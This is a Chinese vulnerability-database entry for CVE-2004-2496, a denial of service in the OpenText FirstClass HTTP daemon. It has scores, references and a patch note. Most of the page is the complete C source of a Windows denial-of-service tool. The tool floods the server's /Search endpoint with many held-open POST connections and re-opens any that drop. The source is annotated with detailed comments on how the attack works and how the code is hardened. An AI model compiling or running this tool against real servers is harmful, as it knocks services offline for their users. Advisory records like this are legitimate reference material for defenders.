CVE-2004-2496
CVSS7.8
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:18
NMCOE    

[原文]The HTTP daemon in OpenText FirstClass 7.1 and 8.0 allows remote attackers to cause a denial of service (service availability loss) via a large number of POST requests to /Search.


[CNNVD]OpenText FirstClass HTTP Daemon Search函数服务拒绝漏洞(CNNVD-200412-610)

        OpenText FirstClass 7.1和8.0版本的HTTP守护程序存在漏洞。远程攻击者可以通过向/Search发送大量POST请求导致拒绝服务(服务可用性丧失)。

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2496
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2496
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-610
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/18424
(UNKNOWN)  XF  firstclass-dos(18424)
http://www.securityfocus.com/bid/11877
(UNKNOWN)  BID  11877
http://www.osvdb.org/12350
(UNKNOWN)  OSVDB  12350
http://securitytracker.com/id?1012478
(UNKNOWN)  SECTRACK  1012478
http://secunia.com/advisories/13415
(VENDOR_ADVISORY)  SECUNIA  13415
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0321.html
(VENDOR_ADVISORY)  FULLDISC  20041214 OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS Vulnerability

- 漏洞信息

OpenText FirstClass HTTP Daemon Search函数服务拒绝漏洞
高危 其他
2004-12-31 00:00:00 2006-09-05 00:00:00
远程  
        OpenText FirstClass 7.1和8.0版本的HTTP守护程序存在漏洞。远程攻击者可以通过向/Search发送大量POST请求导致拒绝服务(服务可用性丧失)。

- 公告与补丁

        A fix is available to address this vulnerability. Customers are advised to contact the vendor for further details in regard to obtaining and applying an appropriate fix.

- 漏洞信息 (687)

OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS (EDBID:687)
windows dos
2004-12-15 Verified
0 dila
N/A [点击下载]
/*
   http://secunia.com/advisories/13415
   written by dila
   released on 11.12.04
   compile with ms vc++
   remember to link with winsock
*/

#define WIN32_LEAN_AND_MEAN   /* trims <windows.h>; in particular it leaves out the legacy winsock.h, which would clash with the <winsock2.h> included below */
#include "windows.h"
/* Resource identifiers for the dialog (the .rc that lays it out is not part of this listing). */
#define IDD_MAIN                        101   /* main dialog template, run from WinMain */
#define IDI_MAIN                        103   /* presumably the application icon; not referenced in this listing */
#define IDC_SERV                        1000  /* edit box: target host name, read into `target` */
#define IDC_SOCKS                       1002  /* edit box: number of connections to open, read into `sockets` */
#define IDHALT                          1004  /* button: stop the attack and release the sockets */

// Next default values for new objects
// 
/* Resource-editor bookkeeping; only visible when APSTUDIO_INVOKED is defined, never to the compiler. */
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE        104
#define _APS_NEXT_COMMAND_VALUE         40001
#define _APS_NEXT_CONTROL_VALUE         1005
#define _APS_NEXT_SYMED_VALUE           101
#endif
#endif // Combined resource.h - milw0rm.com
#include <winsock2.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define WM_WSAASYNC (WM_USER +5)   /* private window message WSAAsyncSelect() delivers socket events with (registered in startupClient) */

BOOL CALLBACK DlgProc(HWND hDlg, UINT uMsg, WPARAM wParam, LPARAM lParam);
int startupClient(HWND hDlg);        /* opens one connection to `server`; returns the handle as an int, 0 on failure */
void StopDoS();                      /* closes the handles held in mySocket */
void EnableDoSButton(HWND hDlg);     /* idle UI state: inputs and Start enabled, Halt disabled */
void DisableDoSButton(HWND hDlg);    /* running UI state: inputs and Start disabled, Halt enabled */

struct hostent *host_entry;          /* gethostbyname() result for `target` */
struct sockaddr_in server;           /* resolved target address, port 80 (filled in by DlgProc) */

WSAData wsaData;
/* The request every connection sends once its FD_CONNECT fires: a keep-alive POST to
 * /Search whose Content-Length (291) matches the urlencoded body after the blank line.
 * Details worth noticing: header lines end in bare "\n" rather than the CRLF HTTP
 * specifies, there is no Host: header although the request claims HTTP/1.1, and the two
 * newlines after the body fall outside the declared length.  The tool's effect comes
 * from holding many such connections open at once (`sockets`, default 256) rather than
 * from the size of any single request. */
char *request="POST /Search HTTP/1.1\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\nAccept-Language: en-us\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\nContent-Length: 291\nConnection: Keep-Alive\nCache-Control: no-cache\n\nCharSet=ISO-8859-1&FieldID%3A1211.0%3DLONG=0&FieldID%3A1202%3DSTRING=&FieldID%3A1208%3DCHECKBOX=on&FieldID%3A1206%3DCHECKBOX=on&FieldID%3A1204%3DCHECKBOX=on&FieldID%3A1207%3DCHECKBOX=on&FieldID%3A1205%3DCHECKBOX=on&FieldID%3A1209%3DCHECKBOX=on&FieldID%3A1212%3DCHECKBOX=on&Input%3A1211.0=+--\n\n";
char target[101];                    /* host name from IDC_SERV; DlgProc reads at most 100 characters into it */
__int64 timer;                       /* GetTickCount() deadline for the next sustain-phase reconnect; starts at 0 */
/* mySocket: heap table of connection handles stored as int, 0 meaning an empty slot,
 * allocated in DlgProc.  sockets: how many connections to open (dialog default 256).
 * isDoS: ramp-up in progress.  sustain: all connections open, lost ones get re-opened.
 * count: next slot to fill during ramp-up.
 * NOTE(review): a Winsock SOCKET is pointer-sized; int slots are only lossless on the
 * 32-bit builds the header comment ("compile with ms vc++", 2004) targets. */
int *mySocket, sockets=256, isDoS=0, sustain=0, count=0;

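/* Process entry point: runs the modal main dialog (resource IDD_MAIN) and exits when it
 * closes.  All work happens in DlgProc; the previous-instance handle, command line and
 * show state are not used.
 *
 * Returns 0 when the dialog ran, 1 when DialogBoxParam could not create it (-1, e.g. a
 * missing dialog resource) so a failed start is not reported as success. */
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
	(void)hPrevInstance;
	(void)lpCmdLine;
	(void)nCmdShow;
	INT_PTR rc = DialogBoxParam(hInstance, MAKEINTRESOURCE(IDD_MAIN), NULL, (DLGPROC)DlgProc, 0);
	return rc == -1 ? 1 : 0;
}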

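/* Shows a start-up rejection and returns the dialog to its idle state. */
static void RejectStart(HWND hDlg, const char *text, const char *caption)
{
	MessageBox(hDlg, text, caption, MB_OK|MB_ICONWARNING);
	EnableDoSButton(hDlg);
}

/* Index of the slot whose value equals `handle`, or -1.  Called with a socket handle to
 * locate a connection, or with 0 to find a free slot.  Only the `sockets` slots in use
 * are examined, never the spare one past them. */
static int FindSlot(WPARAM handle)
{
	if (mySocket == NULL) return -1;
	for (int i = 0; i < sockets; i++)
		if ((unsigned int)mySocket[i] == handle) return i;
	return -1;
}

/* IDOK: validates the dialog input, resolves the target and posts the first WM_WSAASYNC,
 * which starts the event-driven ramp-up in OnSocketEvent().
 * On any rejection the previous table (mySocket / sockets) is left untouched. */
static void StartDoS(HWND hDlg)
{
	DisableDoSButton(hDlg);
	EnableWindow(GetDlgItem(hDlg, IDHALT), 0);   /* Halt becomes usable once every connection is open */
	GetDlgItemText(hDlg, IDC_SERV, target, (int)sizeof target);

	BOOL parsed = FALSE;
	UINT requested = GetDlgItemInt(hDlg, IDC_SOCKS, &parsed, FALSE);
	if (!parsed || requested < 2) {
		RejectStart(hDlg, "You need more sockets to cause a DoS!", "User Error");
		return;
	}
	if (strlen(target) < 1) {
		RejectStart(hDlg, "You need to specify a target!", "User Error");
		return;
	}
	host_entry = gethostbyname(target);
	if (host_entry == NULL || host_entry->h_addrtype != AF_INET
	    || host_entry->h_length != (int)sizeof server.sin_addr) {
		RejectStart(hDlg, "Unable to resolve target!", "DNS Error");
		return;
	}
	/* `sockets` is an int and the table needs requested+1 entries: refuse counts whose
	 * byte size would not fit, instead of handing realloc a wrapped size. */
	if (requested > (UINT)INT_MAX
	    || (size_t)requested > ((size_t)-1) / sizeof *mySocket - 1) {
		SetFocus(hDlg);
		RejectStart(hDlg, "Too many sockets and not enough memory.", "Memory allocation failed!");
		return;
	}

	server.sin_family = AF_INET;
	server.sin_port = htons(80);
	memcpy(&server.sin_addr, host_entry->h_addr, sizeof server.sin_addr);

	/* One spare zeroed slot beyond `sockets`, so loops bounded by sockets+1 elsewhere in
	 * this file can never read past the allocation. */
	size_t slots = (size_t)requested + 1;
	int *grown = (int*)realloc(mySocket, slots * sizeof *grown);
	if (grown == NULL) {
		SetFocus(hDlg);
		RejectStart(hDlg, "Too many sockets and not enough memory.", "Memory allocation failed!");
		return;
	}
	mySocket = grown;
	sockets = (int)requested;
	memset(mySocket, 0, slots * sizeof *mySocket);   /* the whole table, not sizeof(pointer) */
	count = 0;
	isDoS = 1;
	PostMessage(hDlg, WM_WSAASYNC, 0, 0);
}

/* WM_WSAASYNC handler.  wParam is the socket the event concerns (0 for the kick-off
 * message posted by StartDoS), lParam packs the FD_* event and any error code. */
static void OnSocketEvent(HWND hDlg, WPARAM wParam, LPARAM lParam)
{
	if (isDoS) {
		/* Ramp-up: one new connection per message until `sockets` slots are filled; each
		 * connection's own FD_CONNECT / FD_CLOSE event keeps the chain going. */
		if (count < sockets) {
			mySocket[count] = startupClient(hDlg);
			count++;
			SetDlgItemInt(hDlg, IDC_SOCKS, sockets - count, 0);
		} else {
			count = 0;
			isDoS = 0;
			sustain = 1;
			EnableWindow(GetDlgItem(hDlg, IDHALT), 0);
			SetFocus(hDlg);
			/* The box is modal, but messages keep being dispatched to this procedure while
			 * it is up, so the sustain phase runs until the user dismisses it; that then
			 * queues the halt. */
			MessageBox(hDlg, "DoS in progress! Click OK to release sockets.", "Information", MB_OK|MB_ICONINFORMATION);
			PostMessage(hDlg, WM_COMMAND, IDHALT, 0);
		}
	} else if (sustain == 1) {
		/* Sustain: at most once a second, re-open one slot whose connection was lost. */
		if (GetTickCount() > timer) {
			int idle = FindSlot(0);
			if (idle >= 0) mySocket[idle] = startupClient(hDlg);
			timer = GetTickCount() + 1000;
		}
	}

	if (wParam == 0) return;   /* kick-off message, no socket attached */

	WORD event = WSAGETSELECTEVENT(lParam);
	if (event == FD_CONNECT) {
		/* A failed connect arrives as FD_CONNECT with an error code; check it before
		 * sending.  The request is small, so a short (partial) send is not retried. */
		if (WSAGETSELECTERROR(lParam) != 0
		    || send(wParam, request, (int)strlen(request), 0) == SOCKET_ERROR) {
			int slot = FindSlot(wParam);
			closesocket(wParam);
			if (slot >= 0) mySocket[slot] = 0;   /* free the slot so sustain can retry it */
		}
	} else if (event == FD_CLOSE) {
		/* Peer closed: release the handle.  While an attack is active, replace the
		 * connection in this socket's slot (or any free slot if it was untracked). */
		int slot = FindSlot(wParam);
		closesocket(wParam);
		if (slot < 0) slot = FindSlot(0);
		if (slot >= 0) mySocket[slot] = (isDoS || sustain) ? startupClient(hDlg) : 0;
	}
}

/* Dialog procedure for IDD_MAIN.
 *
 * Controls: IDC_SERV (target host), IDC_SOCKS (number of connections), IDOK (start),
 * IDHALT (stop).  Socket activity is delivered by WSAAsyncSelect as WM_WSAASYNC with
 * wParam = socket handle and lParam = event | error, and handled in OnSocketEvent().
 *
 * Phases, driven by the globals isDoS / sustain / count:
 *   isDoS   - connections are opened one per WM_WSAASYNC until `sockets` are up;
 *   sustain - dropped connections are re-established (at most one per second);
 *   IDHALT  - everything is closed via StopDoS().
 *
 * Returns FALSE for every message except WM_CLOSE so the dialog manager applies its
 * default handling.
 */
BOOL CALLBACK DlgProc(HWND hDlg, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	switch (uMsg) {
	case WM_INITDIALOG:
		/* WSAStartup returns 0 on success and a WSA error code otherwise (never -1),
		 * so the failure test must be "!= 0". */
		if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
			MessageBox(hDlg, "Could not initialize winsock! Try looking for a winsock update.", "Fatal Error", MB_OK|MB_ICONSTOP);
			SendMessage(hDlg, WM_CLOSE, 0, 0);
			return FALSE;
		}
		EnableDoSButton(hDlg);
		SetDlgItemText(hDlg, IDC_SERV, "");
		SetDlgItemInt(hDlg, IDC_SOCKS, 256, 0);
		return FALSE;

	case WM_COMMAND:
		/* The control id lives in the low word; the high word is the notification code
		 * (zero for the halt that OnSocketEvent posts). */
		if (LOWORD(wParam) == IDOK) {
			StartDoS(hDlg);
		} else if (LOWORD(wParam) == IDHALT) {
			sustain = 0;
			count = 0;
			isDoS = 0;
			if (mySocket != NULL) StopDoS();
			EnableDoSButton(hDlg);
			SetFocus(hDlg);
			MessageBox(hDlg, "All sockets have been shutdown!", "Information", MB_OK|MB_ICONINFORMATION);
		}
		return FALSE;

	case WM_CLOSE:
		if (mySocket != NULL) StopDoS();
		WSACleanup();
		/* Created by DialogBoxParam (modal), so it is torn down with EndDialog, which
		 * also makes DialogBoxParam return. */
		EndDialog(hDlg, 0);
		return TRUE;

	case WM_WSAASYNC:
		OnSocketEvent(hDlg, wParam, lParam);
		return FALSE;
	}
	return FALSE;
}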

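/* Opens one TCP connection to `server` and registers the dialog for its FD_CONNECT and
 * FD_CLOSE events.
 *
 * Returns the socket handle as an int (the mySocket slot type), or 0 when the socket
 * could not be created, registered, or the connect attempt failed outright.
 *
 * WSAAsyncSelect puts the socket into non-blocking mode, so a connect() that is still in
 * progress returns SOCKET_ERROR with WSAEWOULDBLOCK.  That is the normal outcome here and
 * must not be treated as a failure: doing so would leave every live connection out of the
 * slot table (and out of reach of StopDoS) while its FD_CONNECT still fires.  Genuine
 * failures close the handle before returning so nothing leaks.
 * NOTE(review): the int return is only lossless for 32-bit builds, and a handle value of
 * 0 could not be told apart from "no socket". */
int startupClient(HWND hDlg) {
	SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
	if (s == INVALID_SOCKET) return 0;
	if (WSAAsyncSelect(s, hDlg, WM_WSAASYNC, FD_CONNECT|FD_CLOSE) == SOCKET_ERROR) {
		closesocket(s);
		return 0;
	}
	if (connect(s, (sockaddr*)&server, sizeof(server)) == SOCKET_ERROR
	    && WSAGetLastError() != WSAEWOULDBLOCK) {
		closesocket(s);
		return 0;
	}
	return (int)s;
}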

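/* Closes every tracked connection and frees its slot.
 *
 * Walks only the `sockets` slots that were allocated (not one past the end), skips empty
 * slots instead of calling closesocket(0), and zeroes each slot after closing so a late
 * FD_CLOSE or a second halt cannot close a handle number that has since been reused.
 * Safe to call before any attack has been started (mySocket still NULL). */
void StopDoS()
{
	if (mySocket == NULL) return;
	for (int i = 0; i < sockets; i++) {
		if (mySocket[i] == 0) continue;
		closesocket(mySocket[i]);
		mySocket[i] = 0;
	}
}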

/* Puts the dialog in its idle state: the target and socket-count fields and the Start
 * (IDOK) button accept input, the Halt button is greyed out. */
void EnableDoSButton(HWND hDlg)
{
	static const struct { int id; BOOL enabled; } idle[] = {
		{ IDHALT,    FALSE },
		{ IDC_SERV,  TRUE  },
		{ IDC_SOCKS, TRUE  },
		{ IDOK,      TRUE  },
	};
	for (size_t k = 0; k < sizeof idle / sizeof idle[0]; k++)
		EnableWindow(GetDlgItem(hDlg, idle[k].id), idle[k].enabled);
}

/* Puts the dialog in its running state: Start and the two input fields are locked and
 * Halt becomes the only live control. */
void DisableDoSButton(HWND hDlg)
{
	const int locked[] = { IDOK, IDC_SERV, IDC_SOCKS };
	for (size_t k = 0; k < sizeof locked / sizeof locked[0]; k++)
		EnableWindow(GetDlgItem(hDlg, locked[k]), 0);
	EnableWindow(GetDlgItem(hDlg, IDHALT), 1);
}

// milw0rm.com [2004-12-15]
		

- 漏洞信息

12350
FirstClass /Search Large Request Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Unknown

- 漏洞描述

FirstClass contains a flaw that may allow a remote denial of service. The issue is triggered when numerous POST requests to /Search arrive over separate connections, and results in a loss of availability for the service.

- 时间线

2004-12-14 Unknown
Unknown Unknown

- 解决方案

No workaround is known for this issue; OpenText Corporation has released a patched version that addresses it, which should be obtained from the vendor.

- 相关参考

- 漏洞作者

 

 
